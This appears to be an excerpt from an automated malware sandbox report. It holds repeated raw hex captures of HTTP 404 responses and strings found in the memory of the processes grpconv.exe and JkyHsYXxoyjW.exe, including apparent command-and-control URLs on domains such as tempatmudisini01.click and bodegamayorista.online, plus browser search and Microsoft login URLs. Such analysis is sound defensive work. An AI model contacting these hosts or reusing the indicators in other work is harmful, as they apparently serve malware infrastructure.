d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 42 ff 9c 46 67 4c df f2 76 f7 9a 5f 74 b2 4d d4 71 24 92 15 4e d8 02 ab 92 70 2c a2 e7 34 d6 98 a5 12 42 8a b3 31 ce 26 38 db c3 d9 3e ce 0e 70 76 88 4b 1c e5 22 3e 7b 51 09 4d 71 29 29 26 51 24 31 49 12 49 95 c2 31 83 d1 58 24 14 27 34 c7 49 ca 31 2d 30 78 8a 19 57 f8 2c 4a f0 0b ac 48 51 62 55 90 3c c7 4a 4b c1 e7 58 55 11 fc 96 78 41 24 8e 30 c3 09 ac d4 38 49 b0 c8 71 95 e3 9c e1 94 d1 3c 81 a8 e1 54 c8 02 43 c0 41 78 4e e7 94 27 38 26 a5 66 82 63 22 35 8b 73 30 47 31 d0 1e 13 be 20 0a 8c d0 84 e5 0a d6 cf db 79 70 5b 81 d5 a9 00 fb 25 ce 00 ae e6 32 97 02 0c 28 28 af 30 27 10 09 08 81 11 aa aa a2 20 72 85 35 83 58 c0 dd 19 26 55 c2 04 5e 80 0e 81 d6 30 32 67 3c 18 85 25 f8 6f 12 33 0a eb d4 c0 8d a8 34 00 81 c2 dd 82 1a d3 00 39 24 67 73 1e 44 44 51 f3 26 8c 48 7c 66 f4 f2 24 d0 92 70 88 be 84 ea 08 fb ec 6c ba 74 4f 5f 1c 37 d0 3a 61 aa cc c9 2a b0 a9 73 34 98 fc a3 75 0a 95 68 a0 45 83 f1 61 b9 0c 8d 71 7e 46 d9 3c d3 c1 64 1f 06 6c 01 04 e3 d1 e8 fd b0 19 b6 f7 2d f4 4c fd da e5 3e 49 9e 57 4a d7 33 fd 42 f9 bb df 08 08 48 0a c5 e8 af 02 15 4b a8 cb b0 1b 59 06 19 4b 12 ca 1d 13 01 3c 68 7d 23 84 05 4c ca 69 58 90 65 5d 9c 1b b6 91 4a 8b 3e 0d c6 0c 06 b4 23 4b 91 13 93 53 a8 a5 84 06 11 8b 2b f8 75 f4 98 2a 80 8c 32 de ba 6e 7d 74 72 f4 30 dd 4f 0f d3 e3 d0 3a 05 99 02 dc 98 94 0b 80 5f 01 ce ff 88 ce 59 c4 72 a6 57 5d 60 ea b8 16 80 b4 cc cc 24 dc f0 07 83 f4 27 a1 ad 68 a1 96 fe 8d 39 73 49 56 96 60 42 fb 22 25 05 cb 57 81 f7 94 e6 0b 6a 40 84 7e 42 2b ea e1 ee 19 7b 1f 82 e8 0f 08 9f a3 8f 9e 78 d8 7b ca 24 01 48 0a f4 11 00 0a fd f0 7b 30 f4 63 06 41 56 22 d5 e8 63 f2 94 32 0f 5f fd eb 1f 6f bf ba b8 fe fc 57 d7 6f 3e c3 df 95 60 13 d4 24 57 3e d0 19 4b 9d 88 0c a0 9c 88 4c d9 12 ad ed 1d d0 8e ce c2 97 42 14 c1 78 d7 b4 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 42 ff 9c 46 67 4c df f2 76 f7 9a 5f 74 b2 4d d4 71 24 92 15 4e d8 02 ab 92 70 2c a2 e7 34 d6 98 a5 12 42 8a b3 31 ce 26 38 db c3 d9 3e ce 0e 70 76 88 4b 1c e5 22 3e 7b 51 09 4d 71 29 29 26 51 24 31 49 12 49 95 c2 31 83 d1 58 24 14 27 34 c7 49 ca 31 2d 30 78 8a 19 57 f8 2c 4a f0 0b ac 48 51 62 55 90 3c c7 4a 4b c1 e7 58 55 11 fc 96 78 41 24 8e 30 c3 09 ac d4 38 49 b0 c8 71 95 e3 9c e1 94 d1 3c 81 a8 e1 54 c8 02 43 c0 41 78 4e e7 94 27 38 26 a5 66 82 63 22 35 8b 73 30 47 31 d0 1e 13 be 20 0a 8c d0 84 e5 0a d6 cf db 79 70 5b 81 d5 a9 00 fb 25 ce 00 ae e6 32 97 02 0c 28 28 af 30 27 10 09 08 81 11 aa aa a2 20 72 85 35 83 58 c0 dd 19 26 55 c2 04 5e 80 0e 81 d6 30 32 67 3c 18 85 25 f8 6f 12 33 0a eb d4 c0 8d a8 34 00 81 c2 dd 82 1a d3 00 39 24 67 73 1e 44 44 51 f3 26 8c 48 7c 66 f4 f2 24 d0 92 70 88 be 84 ea 08 fb ec 6c ba 74 4f 5f 1c 37 d0 3a 61 aa cc c9 2a b0 a9 73 34 98 fc a3 75 0a 95 68 a0 45 83 f1 61 b9 0c 8d 71 7e 46 d9 3c d3 c1 64 1f 06 6c 01 04 e3 d1 e8 fd b0 19 b6 f7 2d f4 4c fd da e5 3e 49 9e 57 4a d7 33 fd 42 f9 bb df 08 08 48 0a c5 e8 af 02 15 4b a8 cb b0 1b 59 06 19 4b 12 ca 1d 13 01 3c 68 7d 23 84 05 4c ca 69 58 90 65 5d 9c 1b b6 91 4a 8b 3e 0d c6 0c 06 b4 23 4b 91 13 93 53 a8 a5 84 06 11 8b 2b f8 75 f4 98 2a 80 8c 32 de ba 6e 7d 74 72 f4 30 dd 4f 0f d3 e3 d0 3a 05 99 02 dc 98 94 0b 80 5f 01 ce ff 88 ce 59 c4 72 a6 57 5d 60 ea b8 16 80 b4 cc cc 24 dc f0 07 83 f4 27 a1 ad 68 a1 96 fe 8d 39 73 49 56 96 60 42 fb 22 25 05 cb 57 81 f7 94 e6 0b 6a 40 84 7e 42 2b ea e1 ee 19 7b 1f 82 e8 0f 08 9f a3 8f 9e 78 d8 7b ca 24 01 48 0a f4 11 00 0a fd f0 7b 30 f4 63 06 41 56 22 d5 e8 63 f2 94 32 0f 5f fd eb 1f 6f bf ba b8 fe fc 57 d7 6f 3e c3 df 95 60 13 d4 24 57 3e d0 19 4b 9d 88 0c a0 9c 88 4c d9 12 ad ed 1d d0 8e ce c2 97 42 14 c1 78 d7 b4 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 42 ff 9c 46 67 4c df f2 76 f7 9a 5f 74 b2 4d d4 71 24 92 15 4e d8 02 ab 92 70 2c a2 e7 34 d6 98 a5 12 42 8a b3 31 ce 26 38 db c3 d9 3e ce 0e 70 76 88 4b 1c e5 22 3e 7b 51 09 4d 71 29 29 26 51 24 31 49 12 49 95 c2 31 83 d1 58 24 14 27 34 c7 49 ca 31 2d 30 78 8a 19 57 f8 2c 4a f0 0b ac 48 51 62 55 90 3c c7 4a 4b c1 e7 58 55 11 fc 96 78 41 24 8e 30 c3 09 ac d4 38 49 b0 c8 71 95 e3 9c e1 94 d1 3c 81 a8 e1 54 c8 02 43 c0 41 78 4e e7 94 27 38 26 a5 66 82 63 22 35 8b 73 30 47 31 d0 1e 13 be 20 0a 8c d0 84 e5 0a d6 cf db 79 70 5b 81 d5 a9 00 fb 25 ce 00 ae e6 32 97 02 0c 28 28 af 30 27 10 09 08 81 11 aa aa a2 20 72 85 35 83 58 c0 dd 19 26 55 c2 04 5e 80 0e 81 d6 30 32 67 3c 18 85 25 f8 6f 12 33 0a eb d4 c0 8d a8 34 00 81 c2 dd 82 1a d3 00 39 24 67 73 1e 44 44 51 f3 26 8c 48 7c 66 f4 f2 24 d0 92 70 88 be 84 ea 08 fb ec 6c ba 74 4f 5f 1c 37 d0 3a 61 aa cc c9 2a b0 a9 73 34 98 fc a3 75 0a 95 68 a0 45 83 f1 61 b9 0c 8d 71 7e 46 d9 3c d3 c1 64 1f 06 6c 01 04 e3 d1 e8 fd b0 19 b6 f7 2d f4 4c fd da e5 3e 49 9e 57 4a d7 33 fd 42 f9 bb df 08 08 48 0a c5 e8 af 02 15 4b a8 cb b0 1b 59 06 19 4b 12 ca 1d 13 01 3c 68 7d 23 84 05 4c ca 69 58 90 65 5d 9c 1b b6 91 4a 8b 3e 0d c6 0c 06 b4 23 4b 91 13 93 53 a8 a5 84 06 11 8b 2b f8 75 f4 98 2a 80 8c 32 de ba 6e 7d 74 72 f4 30 dd 4f 0f d3 e3 d0 3a 05 99 02 dc 98 94 0b 80 5f 01 ce ff 88 ce 59 c4 72 a6 57 5d 60 ea b8 16 80 b4 cc cc 24 dc f0 07 83 f4 27 a1 ad 68 a1 96 fe 8d 39 73 49 56 96 60 42 fb 22 25 05 cb 57 81 f7 94 e6 0b 6a 40 84 7e 42 2b ea e1 ee 19 7b 1f 82 e8 0f 08 9f a3 8f 9e 78 d8 7b ca 24 01 48 0a f4 11 00 0a fd f0 7b 30 f4 63 06 41 56 22 d5 e8 63 f2 94 32 0f 5f fd eb 1f 6f bf ba b8 fe fc 57 d7 6f 3e c3 df 95 60 13 d4 24 57 3e d0 19 4b 9d 88 0c a0 9c 88 4c d9 12 ad ed 1d d0 8e ce c2 97 42 14 c1 78 d7 b4 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 42 ff 9c 46 67 4c df f2 76 f7 9a 5f 74 b2 4d d4 71 24 92 15 4e d8 02 ab 92 70 2c a2 e7 34 d6 98 a5 12 42 8a b3 31 ce 26 38 db c3 d9 3e ce 0e 70 76 88 4b 1c e5 22 3e 7b 51 09 4d 71 29 29 26 51 24 31 49 12 49 95 c2 31 83 d1 58 24 14 27 34 c7 49 ca 31 2d 30 78 8a 19 57 f8 2c 4a f0 0b ac 48 51 62 55 90 3c c7 4a 4b c1 e7 58 55 11 fc 96 78 41 24 8e 30 c3 09 ac d4 38 49 b0 c8 71 95 e3 9c e1 94 d1 3c 81 a8 e1 54 c8 02 43 c0 41 78 4e e7 94 27 38 26 a5 66 82 63 22 35 8b 73 30 47 31 d0 1e 13 be 20 0a 8c d0 84 e5 0a d6 cf db 79 70 5b 81 d5 a9 00 fb 25 ce 00 ae e6 32 97 02 0c 28 28 af 30 27 10 09 08 81 11 aa aa a2 20 72 85 35 83 58 c0 dd 19 26 55 c2 04 5e 80 0e 81 d6 30 32 67 3c 18 85 25 f8 6f 12 33 0a eb d4 c0 8d a8 34 00 81 c2 dd 82 1a d3 00 39 24 67 73 1e 44 44 51 f3 26 8c 48 7c 66 f4 f2 24 d0 92 70 88 be 84 ea 08 fb ec 6c ba 74 4f 5f 1c 37 d0 3a 61 aa cc c9 2a b0 a9 73 34 98 fc a3 75 0a 95 68 a0 45 83 f1 61 b9 0c 8d 71 7e 46 d9 3c d3 c1 64 1f 06 6c 01 04 e3 d1 e8 fd b0 19 b6 f7 2d f4 4c fd da e5 3e 49 9e 57 4a d7 33 fd 42 f9 bb df 08 08 48 0a c5 e8 af 02 15 4b a8 cb b0 1b 59 06 19 4b 12 ca 1d 13 01 3c 68 7d 23 84 05 4c ca 69 58 90 65 5d 9c 1b b6 91 4a 8b 3e 0d c6 0c 06 b4 23 4b 91 13 93 53 a8 a5 84 06 11 8b 2b f8 75 f4 98 2a 80 8c 32 de ba 6e 7d 74 72 f4 30 dd 4f 0f d3 e3 d0 3a 05 99 02 dc 98 94 0b 80 5f 01 ce ff 88 ce 59 c4 72 a6 57 5d 60 ea b8 16 80 b4 cc cc 24 dc f0 07 83 f4 27 a1 ad 68 a1 96 fe 8d 39 73 49 56 96 60 42 fb 22 25 05 cb 57 81 f7 94 e6 0b 6a 40 84 7e 42 2b ea e1 ee 19 7b 1f 82 e8 0f 08 9f a3 8f 9e 78 d8 7b ca 24 01 48 0a f4 11 00 0a fd f0 7b 30 f4 63 06 41 56 22 d5 e8 63 f2 94 32 0f 5f fd eb 1f 6f bf ba b8 fe fc 57 d7 6f 3e c3 df 95 60 13 d4 24 57 3e d0 19 4b 9d 88 0c a0 9c 88 4c d9 12 ad ed 1d d0 8e ce c2 97 42 14 c1 78 d7 b4 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 42 ff 9c 46 67 4c df f2 76 f7 9a 5f 74 b2 4d d4 71 24 92 15 4e d8 02 ab 92 70 2c a2 e7 34 d6 98 a5 12 42 8a b3 31 ce 26 38 db c3 d9 3e ce 0e 70 76 88 4b 1c e5 22 3e 7b 51 09 4d 71 29 29 26 51 24 31 49 12 49 95 c2 31 83 d1 58 24 14 27 34 c7 49 ca 31 2d 30 78 8a 19 57 f8 2c 4a f0 0b ac 48 51 62 55 90 3c c7 4a 4b c1 e7 58 55 11 fc 96 78 41 24 8e 30 c3 09 ac d4 38 49 b0 c8 71 95 e3 9c e1 94 d1 3c 81 a8 e1 54 c8 02 43 c0 41 78 4e e7 94 27 38 26 a5 66 82 63 22 35 8b 73 30 47 31 d0 1e 13 be 20 0a 8c d0 84 e5 0a d6 cf db 79 70 5b 81 d5 a9 00 fb 25 ce 00 ae e6 32 97 02 0c 28 28 af 30 27 10 09 08 81 11 aa aa a2 20 72 85 35 83 58 c0 dd 19 26 55 c2 04 5e 80 0e 81 d6 30 32 67 3c 18 85 25 f8 6f 12 33 0a eb d4 c0 8d a8 34 00 81 c2 dd 82 1a d3 00 39 24 67 73 1e 44 44 51 f3 26 8c 48 7c 66 f4 f2 24 d0 92 70 88 be 84 ea 08 fb ec 6c ba 74 4f 5f 1c 37 d0 3a 61 aa cc c9 2a b0 a9 73 34 98 fc a3 75 0a 95 68 a0 45 83 f1 61 b9 0c 8d 71 7e 46 d9 3c d3 c1 64 1f 06 6c 01 04 e3 d1 e8 fd b0 19 b6 f7 2d f4 4c fd da e5 3e 49 9e 57 4a d7 33 fd 42 f9 bb df 08 08 48 0a c5 e8 af 02 15 4b a8 cb b0 1b 59 06 19 4b 12 ca 1d 13 01 3c 68 7d 23 84 05 4c ca 69 58 90 65 5d 9c 1b b6 91 4a 8b 3e 0d c6 0c 06 b4 23 4b 91 13 93 53 a8 a5 84 06 11 8b 2b f8 75 f4 98 2a 80 8c 32 de ba 6e 7d 74 72 f4 30 dd 4f 0f d3 e3 d0 3a 05 99 02 dc 98 94 0b 80 5f 01 ce ff 88 ce 59 c4 72 a6 57 5d 60 ea b8 16 80 b4 cc cc 24 dc f0 07 83 f4 27 a1 ad 68 a1 96 fe 8d 39 73 49 56 96 60 42 fb 22 25 05 cb 57 81 f7 94 e6 0b 6a 40 84 7e 42 2b ea e1 ee 19 7b 1f 82 e8 0f 08 9f a3 8f 9e 78 d8 7b ca 24 01 48 0a f4 11 00 0a fd f0 7b 30 f4 63 06 41 56 22 d5 e8 63 f2 94 32 0f 5f fd eb 1f 6f bf ba b8 fe fc 57 d7 6f 3e c3 df 95 60 13 d4 24 57 3e d0 19 4b 9d 88 0c a0 9c 88 4c d9 12 ad ed 1d d0 8e ce c2 97 42 14 c1 78 d7 b4 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:40:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 34 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 64 69 76 2c 73 70 61 6e 2c 6f 62 6a 65 63 74 2c 69 66 72 61 6d 65 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 70 72 65 2c 61 62 62 72 2c 61 64 64 72 65 73 73 2c 63 69 74 65 2c 63 6f 64 65 2c 64 65 6c 2c 64 66 6e 2c 65 6d 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 71 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 76 61 72 2c 62 2c 69 2c 64 6c 2c 64 74 2c 64 64 2c 6f 6c 2c 75 6c 2c 6c 69 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 63 61 70 74 69 6f 6e 2c 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 63 61 6e 76 61 73 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 2c 74 69 6d 65 2c 6d 61 72 6b 2c 61 75 64 69 6f 2c 76 69 64 65 6f 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6f 75 74 6c 69 6e 65 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 0a 20 20 20 20 20 20 20 20 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c
            Source: grpconv.exe, 00000005.00000002.3870343838.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.00000000031E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZm
            Source: JkyHsYXxoyjW.exe, 00000006.00000002.3871192963.00000000050F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bodegamayorista.online
            Source: JkyHsYXxoyjW.exe, 00000006.00000002.3871192963.00000000050F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bodegamayorista.online/8xob/
            Source: grpconv.exe, 00000005.00000002.3870343838.000000000607A000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.000000000419A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
